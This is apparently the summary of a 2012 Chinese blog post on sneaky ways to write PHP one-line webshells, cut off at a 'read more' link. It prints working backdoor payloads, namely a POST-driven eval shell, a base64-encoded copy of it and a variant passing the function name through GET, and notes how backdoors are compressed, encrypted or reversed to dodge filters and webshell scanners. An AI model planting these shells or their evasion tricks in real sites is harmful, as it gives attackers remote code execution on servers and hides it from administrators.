php一句话猥琐流搞法
摘要:
在渗透中常常遇到拦截eval的,所以< ?php eval($_POST[xiao])?>这种形式的会被拦截常见的是变成base64_decode(PD9waHAgZXZhbCgkX1BPU1RbeGlhb10pPz4=)这种形式可以绕过,另外还有其他形式 < ?php $_GET['eval']($_POST['xiao']);?> 今天见一比较怪的东西:web杀毒。v1.0。点。心想是不是谁有跟云扯上了。 完了才知道是个webshell扫描工具。各位前辈把web后门弄的死去活来的,揍是怕人发现,压缩,加密,字符逆转,一句话,很烂了。 阅读全文
posted @ 2012-09-13 22:43 =_=! 阅读(347) 评论(0) 推荐(0) 编辑